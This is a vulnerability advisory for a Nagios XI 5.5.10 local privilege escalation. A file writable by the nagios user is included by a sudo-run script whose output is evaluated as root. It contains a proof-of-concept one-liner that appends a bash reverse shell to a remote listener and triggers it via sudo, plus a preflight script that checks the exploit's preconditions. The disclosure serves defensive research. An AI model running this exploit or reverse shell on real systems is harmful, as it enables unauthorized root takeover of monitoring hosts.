Nagios XI 5.5.10 config.inc Privilege Escalation

Summary

A privilege escalation in Nagios XI before 5.5.11 allows a local attacker who can execute commands as the nagios user (the account Nagios XI runs as) to obtain root: a script the user may run via sudo includes config.inc.php, which that same user can write.

Product description (from vendor)

“[Nagios XI] Provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house applications, services, and systems”. For more information visit https://www.nagios.com/products/nagios-xi/.

CVE(s)

Details

Root cause analysis

The nagios user can run /usr/local/nagiosxi/scripts/repair_databases.sh via sudo, so the script executes as root. The script evaluates the output of php $BASEDIR/import_xiconfig.php in the root shell to import the current Nagios XI configuration:

    [...]
    BASEDIR=$(dirname $(readlink -f $0))
    [...]
--> eval $(php $BASEDIR/import_xiconfig.php)
    [...]

import_xiconfig.php in turn includes the web configuration file:

<?php
    [...]
    require_once("/usr/local/nagiosxi/html/config/config.inc.php");
    [...]

/usr/local/nagiosxi/html/config/config.inc.php is writable by the Nagios XI user:

$ ls -lah '/usr/local/nagiosxi/html/config/config.inc.php'
-rw-rw-r--. 1 nagios nagios 8.4K Feb 18 18:38 /usr/local/nagiosxi/html/config/config.inc.php

Since the PHP interpreter runs as root under sudo and its standard output is passed to eval in a root shell, PHP code appended to /usr/local/nagiosxi/html/config/config.inc.php by the nagios user is executed as root, and anything it prints is executed as a root shell command. Poisoning config.inc.php therefore yields root privileges.

Proof of concept

  1. Start a TCP listener, edit the reverse shell payload (address and port) if necessary and run the exploit. The appended statement must be parsed as PHP: check first that config.inc.php does not end with a closing ?> tag, otherwise the appended text would be printed verbatim instead of executed.
echo 'print("bash -i >& /dev/tcp/192.168.13.37/31337 0>&1;");' >> '/usr/local/nagiosxi/html/config/config.inc.php' && sudo /usr/local/nagiosxi/scripts/repair_databases.sh
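The three preconditions of the chain described above (the sudo rule on repair_databases.sh, config.inc.php writable by the nagios user, and the file not ending in a closing ?> tag) can be checked before running the proof of concept. The following POSIX shell script is an added example written for this page; it is not Shielder's exploit nor Nagios code. It assumes a Linux host with GNU or busybox stat -c and a sudo that accepts -n -l; the function and variable names are the example's own, and the test data it is exercised with below is constructed.

```shell
#!/bin/sh
# Preflight checks for the config.inc.php -> repair_databases.sh escalation
# chain (added example, not Shielder's or Nagios' code). Run as the nagios user.
# Assumes GNU/busybox `stat -c` and `sudo -n -l`.

CONFIG_INC=/usr/local/nagiosxi/html/config/config.inc.php
REPAIR_SH=/usr/local/nagiosxi/scripts/repair_databases.sh

# file_writable_by USER FILE
# Exit 0 if USER can write FILE according to owner/group/mode bits.
# Mode bits are used instead of `test -w` so the answer is about USER,
# not about the caller (`test -w` is always true when run as root).
file_writable_by() {
    _user=$1
    _file=$2
    [ -e "$_file" ] || return 2
    _owner=$(stat -c %U "$_file")
    _group=$(stat -c %G "$_file")
    _perm=$(stat -c %A "$_file")               # e.g. -rw-rw-r--
    _uw=$(printf '%s' "$_perm" | cut -c3)     # owner write bit
    _gw=$(printf '%s' "$_perm" | cut -c6)     # group write bit
    _ow=$(printf '%s' "$_perm" | cut -c9)     # other write bit
    [ "$_ow" = w ] && return 0
    [ "$_owner" = "$_user" ] && [ "$_uw" = w ] && return 0
    if [ "$_gw" = w ]; then
        for _g in $(id -nG "$_user" 2>/dev/null); do
            [ "$_g" = "$_group" ] && return 0
        done
    fi
    return 1
}

# ends_with_php_close_tag FILE
# Exit 0 if the last non-blank bytes of FILE are "?>". PHP prints text that
# follows a closing tag verbatim, so a print() appended after it would not run.
ends_with_php_close_tag() {
    [ -r "$1" ] || return 2
    [ "$(tr -d ' \t\r\n' < "$1" | tail -c 2)" = '?>' ]
}

# sudo_can_run SCRIPT
# Exit 0 if the caller's sudo policy (sudo -n -l, never prompting) lists SCRIPT.
sudo_can_run() {
    sudo -n -l 2>/dev/null | grep -F -q -- "$1"
}

# nagiosxi_preflight [USER] [CONFIG] [SCRIPT]
# Prints one line per precondition; exits 0 only when all of them hold.
nagiosxi_preflight() {
    _u=${1:-$(id -un)}
    _c=${2:-$CONFIG_INC}
    _s=${3:-$REPAIR_SH}
    _ok=0
    if sudo_can_run "$_s"; then echo "[+] sudo -l lists $_s"
    else echo "[-] sudo -l does not list $_s"; _ok=1; fi
    if file_writable_by "$_u" "$_c"; then echo "[+] $_c is writable by $_u"
    else echo "[-] $_c is not writable by $_u"; _ok=1; fi
    if ends_with_php_close_tag "$_c"; then
        echo "[-] $_c ends with ?>: appended PHP would be printed, not executed"; _ok=1
    else echo "[+] $_c has no trailing ?>: appended PHP is parsed"; fi
    return $_ok
}

# Invoke as `sh preflight.sh run` (hypothetical file name) to perform the checks;
# without the argument the file only defines the functions.
if [ "${1:-}" = run ]; then nagiosxi_preflight; fi
```

The write check deliberately ignores sudo-granted or ACL-based access and looks only at the classic mode bits that the ls output above shows; on a host where the file is group-writable, the group membership of the nagios user is what decides.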

Impact

An attacker who can execute commands as the nagios user can escalate to root and take full control of the Nagios XI host.

Remediation

Upgrade to Nagios XI 5.5.11 or later. (Note: we didn’t verify the patch.)

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

  • 20/02/2019:
    • Vulnerability report is sent to vendor
    • Vendor acknowledges issue and begins triage process
  • 28/02/2019: Vendor releases Nagios XI 5.5.11
  • 10/04/2019: Shielder’s advisory is made public

Credits

`polict` of Shielder

Date

10 April 2019